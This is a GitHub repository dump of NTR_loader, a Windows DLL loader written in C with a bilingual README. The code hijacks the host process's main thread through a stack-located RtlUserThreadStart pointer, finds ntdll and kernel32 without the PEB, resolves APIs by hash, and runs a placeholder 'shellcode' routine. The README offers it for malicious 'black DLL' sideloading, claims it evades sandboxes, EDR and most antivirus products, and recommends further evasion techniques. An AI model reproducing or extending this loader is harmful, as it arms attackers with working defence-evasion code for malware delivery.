├── pic └── demo.png ├── NTR_loader ├── NTR_loader.h ├── NTR_loader.vcxproj.filters ├── NTR_loader.sln ├── GetApiAddr.c ├── NTR_loader.c └── NTR_loader.vcxproj ├── LICENSE ├── README.md └── .gitignore /pic/demo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/miunasu/NTR_loader/HEAD/pic/demo.png -------------------------------------------------------------------------------- /NTR_loader/NTR_loader.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | #include 4 | #include 5 | 6 | HANDLE ntdll_RtlUserThreadStart; 7 | HANDLE Ntdll_handle; 8 | HANDLE Kernel32_handle; 9 | BYTE key; 10 | HANDLE exe_handle; 11 | FARPROC WINAPI GetFunctionAddressByHash(HMODULE hMod, DWORD FuncHash); 12 | __declspec(dllexport) void ExportedFunction(); 13 | void function(LPTHREAD_START_ROUTINE oep, LPVOID parameter); 14 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2025 miunasu 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /NTR_loader/NTR_loader.vcxproj.filters: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 源文件 20 | 21 | 22 | 源文件 23 | 24 | 25 | 26 | 27 | 头文件 28 | 29 | 30 | -------------------------------------------------------------------------------- /NTR_loader/NTR_loader.sln: -------------------------------------------------------------------------------- 1 | 2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.4.33122.133 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NTR_loader", "NTR_loader.vcxproj", "{27232597-34D2-478A-813D-CC6A8069212F}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x64 = Debug|x64 11 | Debug|x86 = Debug|x86 12 | Release|x64 = Release|x64 13 | Release|x86 = Release|x86 14 | EndGlobalSection 15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 16 | {27232597-34D2-478A-813D-CC6A8069212F}.Debug|x64.ActiveCfg = Debug|x64 17 | {27232597-34D2-478A-813D-CC6A8069212F}.Debug|x64.Build.0 = Debug|x64 18 | {27232597-34D2-478A-813D-CC6A8069212F}.Debug|x86.ActiveCfg = Debug|Win32 19 | {27232597-34D2-478A-813D-CC6A8069212F}.Debug|x86.Build.0 = Debug|Win32 20 | {27232597-34D2-478A-813D-CC6A8069212F}.Release|x64.ActiveCfg = Release|x64 21 | {27232597-34D2-478A-813D-CC6A8069212F}.Release|x64.Build.0 = Release|x64 22 | {27232597-34D2-478A-813D-CC6A8069212F}.Release|x86.ActiveCfg = Release|Win32 23 | {27232597-34D2-478A-813D-CC6A8069212F}.Release|x86.Build.0 = Release|Win32 24 | EndGlobalSection 25 | GlobalSection(SolutionProperties) = preSolution 26 | HideSolutionNode = FALSE 27 | EndGlobalSection 28 | GlobalSection(ExtensibilityGlobals) = postSolution 29 | SolutionGuid = {98B15B8A-B673-43D8-80FC-D06062B79F31} 30 | EndGlobalSection 31 | EndGlobal 32 | -------------------------------------------------------------------------------- /NTR_loader/GetApiAddr.c: -------------------------------------------------------------------------------- 1 | #include "NTR_loader.h" 2 | 3 | 4 | __forceinline DWORD ror(DWORD d) 5 | { 6 | return _rotr(d, 2); 7 | } 8 | 9 | __forceinline DWORD hash(char* c) 10 | { 11 | register DWORD h = 0; 12 | do 13 | { 14 | h = ror(h); 15 | h += *c ^ key; 16 | } while (*++c); 17 | 18 | return h; 19 | } 20 | 21 | 22 | FARPROC WINAPI GetFunctionAddressByHash(HMODULE hMod, DWORD FuncHash) 23 | { 24 | char* pBaseAddr = (char*)hMod; 25 | 26 | // get pointers to main headers/structures 27 | IMAGE_DOS_HEADER* pDosHdr = (IMAGE_DOS_HEADER*)pBaseAddr; 28 | IMAGE_NT_HEADERS* pNTHdr = (IMAGE_NT_HEADERS*)(pBaseAddr + pDosHdr->e_lfanew); 29 | IMAGE_OPTIONAL_HEADER* pOptionalHdr = &pNTHdr->OptionalHeader; 30 | IMAGE_DATA_DIRECTORY* pExportDataDir = (IMAGE_DATA_DIRECTORY*)(&pOptionalHdr->DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]); 31 | IMAGE_EXPORT_DIRECTORY* pExportDirAddr = (IMAGE_EXPORT_DIRECTORY*)(pBaseAddr + pExportDataDir->VirtualAddress); 32 | 33 | // function address we're looking for 34 | void* pProcAddr; 35 | 36 | // resolve function by ordinal 37 | pProcAddr = NULL; 38 | 39 | DWORD* pFuncNameTbl = (DWORD*)(pBaseAddr + pExportDirAddr->AddressOfNames); 40 | WORD* pHintsTbl = (WORD*)(pBaseAddr + pExportDirAddr->AddressOfNameOrdinals); 41 | 42 | DWORD* pEAT = (DWORD*)(pBaseAddr + pExportDirAddr->AddressOfFunctions); 43 | 44 | // parse through table of function names 45 | DWORD ii = 254; 46 | for (ii = 0; ii < pExportDirAddr->NumberOfNames; ii++) 47 | { 48 | char* sTmpFuncName = (char*)pBaseAddr + (DWORD_PTR)pFuncNameTbl[ii]; 49 | DWORD hash_calc = hash(sTmpFuncName); 50 | if (hash_calc == FuncHash) 51 | { 52 | // found, get the function virtual address = RVA + BaseAddr 53 | pProcAddr = (FARPROC)(pBaseAddr + (DWORD_PTR)pEAT[pHintsTbl[ii]]); 54 | break; 55 | } 56 | } 57 | 58 | return (FARPROC)pProcAddr; 59 | } -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # NTR loader 2 | Loader Pre-Technology, Main thread hijacking without using API, get ntdll and kernel32 handle without peb. 3 | 加载器前置技术，不使用API进行主线程劫持，不使用PEB获取ntdll和kernel32的地址。 4 | 5 | This method is an improvement and extension of [NativeThreadRobber](https://github.com/miunasu/NativeThreadRobber). 6 | 该技术是[NativeThreadRobber](https://github.com/miunasu/NativeThreadRobber)的改进和扩展。 7 | 8 | eg: use to black dll. 9 | eg: 用于黑dll。 10 | # What this project can do 11 | Are you tired of the sandbox? 12 | 你是否厌烦了沙箱? 13 | Are you afraid that the method to get the handle through the PEB is already marked? 14 | 你是否害怕通过PEB获取句柄的方法已被标记? 15 | 16 | After testing, whether it is a cloud sandbox or an edr sandbox, use rundll or loadlibrary with getprocess to start black dll, all of them fail to run properly and produce dynamic results. 17 | theory: [NativeThreadRobber](https://github.com/miunasu/NativeThreadRobber). 18 | 经过测试，不管是云沙箱还是edr本地沙箱，使用rundll或者loadlibrary配合getprocess来启动黑dll，全都无法正常运行并跑出动态结果。 19 | 原理: [NativeThreadRobber](https://github.com/miunasu/NativeThreadRobber) 20 | 21 | Get the handles of ntdll and kernel32 through the process of main thread hijacking. 22 | 通过主线程劫持的过程获取ntdll和kernel32的句柄。 23 | 24 | No API will be used at all to achieve the above purpose! 25 | 不使用任何API达到以上效果！ 26 | 27 | ![](./pic/demo.png) 28 | 29 | # Other 30 | This Pre-Technology can achieve good anti anti-virus effect in combination with other technologies。After writing a simple loader for testing, it can avoid killing by most anti-virus software. 31 | 32 | 该前置技术配合其他免杀技术可以达成良好的免杀效果，经过编写简易加载器测试，免杀大部分国外杀软，通杀国内杀软，包括XXX天擎edr、xx智甲edr等。 33 | 34 | This project is just to share new and interesting simple techniques I found, so I won’t write about the matching technology in detail. 35 | Recommended matching technology: 36 | >Gate Series 37 | >Stack Spoof 38 | >RDI 39 | >Unhook 40 | >Anti local Sandbox 41 | >SigFlip 42 | >Obfuscate 43 | >Encode 44 | >...... 45 | 46 | 该项目仅分享我新发现的有趣的简单技术，所以就不详细编写其他配合的技术。 47 | 推荐配合使用的技术： 48 | >门系列 49 | >栈欺骗 50 | >反射式注入 51 | >反hook 52 | >反杀软本地沙箱 53 | >SigFlip 54 | >混淆 55 | >加密 56 | >...... 57 | 58 | 59 | 60 | # Support 61 | It's support x64 and x86 both. 62 | If you have any question, please open an issue on GitHub. 63 | 64 | -------------------------------------------------------------------------------- /NTR_loader/NTR_loader.c: -------------------------------------------------------------------------------- 1 | #include "NTR_loader.h" 2 | 3 | #ifdef _WIN64 4 | int Cx_off = 0x80; 5 | int Ip_off = 0xf8; 6 | int step = 0x10; 7 | size_t addr_max = 0x7FFFFFFF0000; 8 | size_t addr_min = 0x7FF000000000; 9 | void functions_wrap(LPTHREAD_START_ROUTINE a, LPVOID b) { 10 | function(a, b); 11 | } 12 | #else 13 | int Cx_off = 0xac; 14 | int Ip_off = 0xb4; 15 | int step = 4; 16 | size_t addr_max = 0x7FFFF000; 17 | size_t addr_min = 0x70000000; 18 | __declspec(naked) void functions_wrap() { 19 | __asm { 20 | push ebx 21 | push eax 22 | call function 23 | } 24 | } 25 | #endif 26 | 27 | 28 | BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) 29 | { 30 | switch (ul_reason_for_call) 31 | { 32 | case DLL_PROCESS_ATTACH: 33 | { 34 | NT_TIB* teb = NtCurrentTeb(); 35 | intptr_t* StackBase = teb->StackBase; 36 | StackBase = (intptr_t*)((char*)StackBase - sizeof(intptr_t)); 37 | PHANDLE RtlUserThreadStart = 0; 38 | 39 | while (RtlUserThreadStart == 0) 40 | { 41 | if (*StackBase != 0) 42 | { 43 | if (addr_min < *StackBase && *StackBase < addr_max) 44 | { 45 | RtlUserThreadStart = StackBase; 46 | ntdll_RtlUserThreadStart = *RtlUserThreadStart; 47 | } 48 | } 49 | if ((intptr_t)teb->StackBase - (intptr_t)StackBase > 0x10000) 50 | { 51 | printf("Fail to find RtlUserThreadStart\n"); 52 | exit(-1); 53 | } 54 | StackBase = (intptr_t*)((char*)StackBase - step); 55 | } 56 | printf("This is dll main\n"); 57 | printf("Get RtlUserThreadStart address: %p, Hijack main thread!\n", ntdll_RtlUserThreadStart); 58 | *RtlUserThreadStart = &functions_wrap; 59 | break; 60 | } 61 | case DLL_PROCESS_DETACH: 62 | break; 63 | case DLL_THREAD_ATTACH: 64 | break; 65 | case DLL_THREAD_DETACH: 66 | break; 67 | } 68 | return TRUE; 69 | } 70 | 71 | HANDLE GetImageBase(HANDLE addr) 72 | { 73 | while (*(long long*)addr != 0x0300905A4D) 74 | { 75 | addr = (intptr_t*)((char*)addr - 0x1000); 76 | } 77 | return addr; 78 | } 79 | 80 | 81 | HANDLE GetImageBase32_kernel32(HANDLE addr) 82 | { 83 | while (*(long long*)addr != 0x0300905A4D) 84 | { 85 | addr = (intptr_t*)((char*)addr - 0x10000); 86 | } 87 | return addr; 88 | } 89 | 90 | 91 | void Execute_shellcode(char* param) 92 | { 93 | printf("do anything you want\n%s\n", param); 94 | } 95 | 96 | 97 | void function(LPTHREAD_START_ROUTINE oep, LPVOID parameter) 98 | { 99 | HANDLE ThreadInitThunkFunction = 0; 100 | BYTE* POINT = (BYTE*)ntdll_RtlUserThreadStart; 101 | BYTE* point = (BYTE*)ntdll_RtlUserThreadStart; 102 | key = 0x47; 103 | Ntdll_handle = 0; 104 | Kernel32_handle = 0; 105 | printf("Hijack success, start get ntdll and kernel32 handle.\n"); 106 | 107 | while (1) 108 | { 109 | #ifdef _WIN64 110 | if (point[0] == 0x48 && point[1] == 0x8B && point[2] == 0x05) 111 | { 112 | ThreadInitThunkFunction = *(intptr_t*)(*(int*)(point + 3) + 7 + (intptr_t)(point)); 113 | break; 114 | } 115 | #else 116 | // E9 jmp 117 | if (point[0] == 0xE9 && point[4] == 0xFF) 118 | { 119 | point = point + 5 + *(int*)(point + 1); 120 | int count = 0; 121 | POINT = point; 122 | while (1) 123 | { 124 | // E8 call 125 | if (point[0] == 0xE8 && point[4] == 0) 126 | { 127 | count++; 128 | if (count == 2) 129 | { 130 | point = point + 5 + *(int*)(point + 1); 131 | POINT = point; 132 | while (1) 133 | { 134 | // mov esi, addr 135 | if (point[0] == 0x8B && point[1] == 0x35) 136 | { 137 | ThreadInitThunkFunction = *(intptr_t*)(*(int*)(point + 2)); 138 | break; 139 | } 140 | if (point - POINT > 0x30) 141 | { 142 | break; 143 | } 144 | point++; 145 | } 146 | break; 147 | } 148 | } 149 | if (point - POINT > 0x40 || count >= 3) 150 | { 151 | break; 152 | } 153 | point++; 154 | } 155 | break; 156 | } 157 | #endif 158 | if (point - POINT > 0x70) 159 | { 160 | break; 161 | } 162 | point++; 163 | } 164 | 165 | 166 | if (ThreadInitThunkFunction == 0) 167 | { 168 | printf("Can't find ThreadInitThunkFunction\nexit"); 169 | exit(-1); 170 | 171 | } 172 | #ifdef _WIN64 173 | Kernel32_handle = GetImageBase(((intptr_t)ThreadInitThunkFunction >> 12) << 12); 174 | #else 175 | Kernel32_handle = GetImageBase32_kernel32(((intptr_t)ThreadInitThunkFunction >> 16) << 16); 176 | #endif 177 | Ntdll_handle = GetImageBase(((intptr_t)ntdll_RtlUserThreadStart >> 12) << 12); 178 | exe_handle = GetImageBase(((intptr_t)oep >> 12) << 12); 179 | printf("Ntdll: %p\n", Ntdll_handle); 180 | printf("Kernel32: %p\n", Kernel32_handle); 181 | printf("exe_handle: %p\n", exe_handle); 182 | 183 | typedef NTSTATUS(WINAPI* FRtlQueueWorkItem)(void* function, PVOID context, ULONG flags); 184 | FRtlQueueWorkItem RtlQueueWorkItem = GetFunctionAddressByHash(Ntdll_handle, 0x24318c7a); 185 | if (RtlQueueWorkItem(&Execute_shellcode, "Hello World", WT_EXECUTEDEFAULT) == 0) 186 | { 187 | //printf("Success\n"); 188 | } 189 | else 190 | { 191 | //printf("Fail\n"); 192 | exit(-1); 193 | } 194 | 195 | printf("We can back to exe oep.\n"); 196 | 197 | #ifdef _WIN64 198 | typedef void (WINAPI* RtlUserThreadStart_func)(LPTHREAD_START_ROUTINE, LPVOID); 199 | RtlUserThreadStart_func func = (RtlUserThreadStart_func)ntdll_RtlUserThreadStart; 200 | func(oep, parameter); 201 | #else 202 | __asm{ 203 | mov eax,oep 204 | mov ebx, parameter 205 | call ntdll_RtlUserThreadStart 206 | } 207 | #endif 208 | } 209 | 210 | 211 | __declspec(dllexport) void ExportedFunction() 212 | { 213 | printf("This is dll export function.\nDefining fake function what you need export.\nEnd dll export function.\n"); 214 | } 215 | 216 | 217 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/main/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | *.env 13 | 14 | # User-specific files (MonoDevelop/Xamarin Studio) 15 | *.userprefs 16 | 17 | # Mono auto generated files 18 | mono_crash.* 19 | 20 | # Build results 21 | [Dd]ebug/ 22 | [Dd]ebugPublic/ 23 | [Rr]elease/ 24 | [Rr]eleases/ 25 | x64/ 26 | x86/ 27 | [Ww][Ii][Nn]32/ 28 | [Aa][Rr][Mm]/ 29 | [Aa][Rr][Mm]64/ 30 | [Aa][Rr][Mm]64[Ee][Cc]/ 31 | bld/ 32 | [Oo]bj/ 33 | [Oo]ut/ 34 | [Ll]og/ 35 | [Ll]ogs/ 36 | 37 | # Build results on 'Bin' directories 38 | **/[Bb]in/* 39 | # Uncomment if you have tasks that rely on *.refresh files to move binaries 40 | # (https://github.com/github/gitignore/pull/3736) 41 | #!**/[Bb]in/*.refresh 42 | 43 | # Visual Studio 2015/2017 cache/options directory 44 | .vs/ 45 | # Uncomment if you have tasks that create the project's static files in wwwroot 46 | #wwwroot/ 47 | 48 | # Visual Studio 2017 auto generated files 49 | Generated\ Files/ 50 | 51 | # MSTest test Results 52 | [Tt]est[Rr]esult*/ 53 | [Bb]uild[Ll]og.* 54 | *.trx 55 | 56 | # NUnit 57 | *.VisualState.xml 58 | TestResult.xml 59 | nunit-*.xml 60 | 61 | # Approval Tests result files 62 | *.received.* 63 | 64 | # Build Results of an ATL Project 65 | [Dd]ebugPS/ 66 | [Rr]eleasePS/ 67 | dlldata.c 68 | 69 | # Benchmark Results 70 | BenchmarkDotNet.Artifacts/ 71 | 72 | # .NET Core 73 | project.lock.json 74 | project.fragment.lock.json 75 | artifacts/ 76 | 77 | # ASP.NET Scaffolding 78 | ScaffoldingReadMe.txt 79 | 80 | # StyleCop 81 | StyleCopReport.xml 82 | 83 | # Files built by Visual Studio 84 | *_i.c 85 | *_p.c 86 | *_h.h 87 | *.ilk 88 | *.meta 89 | *.obj 90 | *.idb 91 | *.iobj 92 | *.pch 93 | *.pdb 94 | *.ipdb 95 | *.pgc 96 | *.pgd 97 | *.rsp 98 | # but not Directory.Build.rsp, as it configures directory-level build defaults 99 | !Directory.Build.rsp 100 | *.sbr 101 | *.tlb 102 | *.tli 103 | *.tlh 104 | *.tmp 105 | *.tmp_proj 106 | *_wpftmp.csproj 107 | *.log 108 | *.tlog 109 | *.vspscc 110 | *.vssscc 111 | .builds 112 | *.pidb 113 | *.svclog 114 | *.scc 115 | 116 | # Chutzpah Test files 117 | _Chutzpah* 118 | 119 | # Visual C++ cache files 120 | ipch/ 121 | *.aps 122 | *.ncb 123 | *.opendb 124 | *.opensdf 125 | *.sdf 126 | *.cachefile 127 | *.VC.db 128 | *.VC.VC.opendb 129 | 130 | # Visual Studio profiler 131 | *.psess 132 | *.vsp 133 | *.vspx 134 | *.sap 135 | 136 | # Visual Studio Trace Files 137 | *.e2e 138 | 139 | # TFS 2012 Local Workspace 140 | $tf/ 141 | 142 | # Guidance Automation Toolkit 143 | *.gpState 144 | 145 | # ReSharper is a .NET coding add-in 146 | _ReSharper*/ 147 | *.[Rr]e[Ss]harper 148 | *.DotSettings.user 149 | 150 | # TeamCity is a build add-in 151 | _TeamCity* 152 | 153 | # DotCover is a Code Coverage Tool 154 | *.dotCover 155 | 156 | # AxoCover is a Code Coverage Tool 157 | .axoCover/* 158 | !.axoCover/settings.json 159 | 160 | # Coverlet is a free, cross platform Code Coverage Tool 161 | coverage*.json 162 | coverage*.xml 163 | coverage*.info 164 | 165 | # Visual Studio code coverage results 166 | *.coverage 167 | *.coveragexml 168 | 169 | # NCrunch 170 | _NCrunch_* 171 | .NCrunch_* 172 | .*crunch*.local.xml 173 | nCrunchTemp_* 174 | 175 | # MightyMoose 176 | *.mm.* 177 | AutoTest.Net/ 178 | 179 | # Web workbench (sass) 180 | .sass-cache/ 181 | 182 | # Installshield output folder 183 | [Ee]xpress/ 184 | 185 | # DocProject is a documentation generator add-in 186 | DocProject/buildhelp/ 187 | DocProject/Help/*.HxT 188 | DocProject/Help/*.HxC 189 | DocProject/Help/*.hhc 190 | DocProject/Help/*.hhk 191 | DocProject/Help/*.hhp 192 | DocProject/Help/Html2 193 | DocProject/Help/html 194 | 195 | # Click-Once directory 196 | publish/ 197 | 198 | # Publish Web Output 199 | *.[Pp]ublish.xml 200 | *.azurePubxml 201 | # Note: Comment the next line if you want to checkin your web deploy settings, 202 | # but database connection strings (with potential passwords) will be unencrypted 203 | *.pubxml 204 | *.publishproj 205 | 206 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 207 | # checkin your Azure Web App publish settings, but sensitive information contained 208 | # in these scripts will be unencrypted 209 | PublishScripts/ 210 | 211 | # NuGet Packages 212 | *.nupkg 213 | # NuGet Symbol Packages 214 | *.snupkg 215 | # The packages folder can be ignored because of Package Restore 216 | **/[Pp]ackages/* 217 | # except build/, which is used as an MSBuild target. 218 | !**/[Pp]ackages/build/ 219 | # Uncomment if necessary however generally it will be regenerated when needed 220 | #!**/[Pp]ackages/repositories.config 221 | # NuGet v3's project.json files produces more ignorable files 222 | *.nuget.props 223 | *.nuget.targets 224 | 225 | # Microsoft Azure Build Output 226 | csx/ 227 | *.build.csdef 228 | 229 | # Microsoft Azure Emulator 230 | ecf/ 231 | rcf/ 232 | 233 | # Windows Store app package directories and files 234 | AppPackages/ 235 | BundleArtifacts/ 236 | Package.StoreAssociation.xml 237 | _pkginfo.txt 238 | *.appx 239 | *.appxbundle 240 | *.appxupload 241 | 242 | # Visual Studio cache files 243 | # files ending in .cache can be ignored 244 | *.[Cc]ache 245 | # but keep track of directories ending in .cache 246 | !?*.[Cc]ache/ 247 | 248 | # Others 249 | ClientBin/ 250 | ~$* 251 | *~ 252 | *.dbmdl 253 | *.dbproj.schemaview 254 | *.jfm 255 | *.pfx 256 | *.publishsettings 257 | orleans.codegen.cs 258 | 259 | # Including strong name files can present a security risk 260 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 261 | #*.snk 262 | 263 | # Since there are multiple workflows, uncomment next line to ignore bower_components 264 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 265 | #bower_components/ 266 | 267 | # RIA/Silverlight projects 268 | Generated_Code/ 269 | 270 | # Backup & report files from converting an old project file 271 | # to a newer Visual Studio version. Backup files are not needed, 272 | # because we have git ;-) 273 | _UpgradeReport_Files/ 274 | Backup*/ 275 | UpgradeLog*.XML 276 | UpgradeLog*.htm 277 | ServiceFabricBackup/ 278 | *.rptproj.bak 279 | 280 | # SQL Server files 281 | *.mdf 282 | *.ldf 283 | *.ndf 284 | 285 | # Business Intelligence projects 286 | *.rdl.data 287 | *.bim.layout 288 | *.bim_*.settings 289 | *.rptproj.rsuser 290 | *- [Bb]ackup.rdl 291 | *- [Bb]ackup ([0-9]).rdl 292 | *- [Bb]ackup ([0-9][0-9]).rdl 293 | 294 | # Microsoft Fakes 295 | FakesAssemblies/ 296 | 297 | # GhostDoc plugin setting file 298 | *.GhostDoc.xml 299 | 300 | # Node.js Tools for Visual Studio 301 | .ntvs_analysis.dat 302 | node_modules/ 303 | 304 | # Visual Studio 6 build log 305 | *.plg 306 | 307 | # Visual Studio 6 workspace options file 308 | *.opt 309 | 310 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 311 | *.vbw 312 | 313 | # Visual Studio 6 auto-generated project file (contains which files were open etc.) 314 | *.vbp 315 | 316 | # Visual Studio 6 workspace and project file (working project files containing files to include in project) 317 | *.dsw 318 | *.dsp 319 | 320 | # Visual Studio 6 technical files 321 | *.ncb 322 | *.aps 323 | 324 | # Visual Studio LightSwitch build output 325 | **/*.HTMLClient/GeneratedArtifacts 326 | **/*.DesktopClient/GeneratedArtifacts 327 | **/*.DesktopClient/ModelManifest.xml 328 | **/*.Server/GeneratedArtifacts 329 | **/*.Server/ModelManifest.xml 330 | _Pvt_Extensions 331 | 332 | # Paket dependency manager 333 | **/.paket/paket.exe 334 | paket-files/ 335 | 336 | # FAKE - F# Make 337 | **/.fake/ 338 | 339 | # CodeRush personal settings 340 | **/.cr/personal 341 | 342 | # Python Tools for Visual Studio (PTVS) 343 | **/__pycache__/ 344 | *.pyc 345 | 346 | # Cake - Uncomment if you are using it 347 | #tools/** 348 | #!tools/packages.config 349 | 350 | # Tabs Studio 351 | *.tss 352 | 353 | # Telerik's JustMock configuration file 354 | *.jmconfig 355 | 356 | # BizTalk build output 357 | *.btp.cs 358 | *.btm.cs 359 | *.odx.cs 360 | *.xsd.cs 361 | 362 | # OpenCover UI analysis results 363 | OpenCover/ 364 | 365 | # Azure Stream Analytics local run output 366 | ASALocalRun/ 367 | 368 | # MSBuild Binary and Structured Log 369 | *.binlog 370 | MSBuild_Logs/ 371 | 372 | # AWS SAM Build and Temporary Artifacts folder 373 | .aws-sam 374 | 375 | # NVidia Nsight GPU debugger configuration file 376 | *.nvuser 377 | 378 | # MFractors (Xamarin productivity tool) working folder 379 | **/.mfractor/ 380 | 381 | # Local History for Visual Studio 382 | **/.localhistory/ 383 | 384 | # Visual Studio History (VSHistory) files 385 | .vshistory/ 386 | 387 | # BeatPulse healthcheck temp database 388 | healthchecksdb 389 | 390 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 391 | MigrationBackup/ 392 | 393 | # Ionide (cross platform F# VS Code tools) working folder 394 | **/.ionide/ 395 | 396 | # Fody - auto-generated XML schema 397 | FodyWeavers.xsd 398 | 399 | # VS Code files for those working on multiple tools 400 | .vscode/* 401 | !.vscode/settings.json 402 | !.vscode/tasks.json 403 | !.vscode/launch.json 404 | !.vscode/extensions.json 405 | !.vscode/*.code-snippets 406 | 407 | # Local History for Visual Studio Code 408 | .history/ 409 | 410 | # Built Visual Studio Code Extensions 411 | *.vsix 412 | 413 | # Windows Installer files from build outputs 414 | *.cab 415 | *.msi 416 | *.msix 417 | *.msm 418 | *.msp 419 | -------------------------------------------------------------------------------- /NTR_loader/NTR_loader.vcxproj: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | 16.0 23 | Win32Proj 24 | {27232597-34d2-478a-813d-cc6a8069212f} 25 | NTRloader 26 | 10.0 27 | 28 | 29 | 30 | DynamicLibrary 31 | true 32 | v143 33 | Unicode 34 | 35 | 36 | DynamicLibrary 37 | false 38 | v143 39 | true 40 | Unicode 41 | 42 | 43 | DynamicLibrary 44 | true 45 | v143 46 | Unicode 47 | 48 | 49 | DynamicLibrary 50 | false 51 | v143 52 | true 53 | Unicode 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | false 76 | 77 | 78 | false 79 | 80 | 81 | false 82 | 83 | 84 | false 85 | 86 | 87 | 88 | Level3 89 | true 90 | WIN32;_DEBUG;NTRLOADER_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 91 | false 92 | NotUsing 93 | pch.h 94 | None 95 | MultiThreaded 96 | false 97 | false 98 | 99 | 100 | Windows 101 | false 102 | false 103 | 104 | 105 | 106 | 107 | Level3 108 | true 109 | true 110 | true 111 | WIN32;NDEBUG;NTRLOADER_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 112 | false 113 | NotUsing 114 | pch.h 115 | None 116 | MultiThreaded 117 | false 118 | false 119 | 120 | 121 | Windows 122 | true 123 | true 124 | false 125 | false 126 | 127 | 128 | 129 | 130 | Level3 131 | true 132 | _DEBUG;NTRLOADER_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 133 | false 134 | NotUsing 135 | pch.h 136 | None 137 | MultiThreaded 138 | false 139 | false 140 | 141 | 142 | Windows 143 | false 144 | false 145 | 146 | 147 | 148 | 149 | Level3 150 | true 151 | true 152 | true 153 | NDEBUG;NTRLOADER_EXPORTS;_WINDOWS;_USRDLL;%(PreprocessorDefinitions) 154 | false 155 | NotUsing 156 | pch.h 157 | None 158 | MultiThreaded 159 | false 160 | false 161 | 162 | 163 | Windows 164 | true 165 | true 166 | false 167 | false 168 | 169 | 170 | 171 | 172 | 173 | 174 | 175 | 176 | 177 | 178 | 179 | 180 | 181 | --------------------------------------------------------------------------------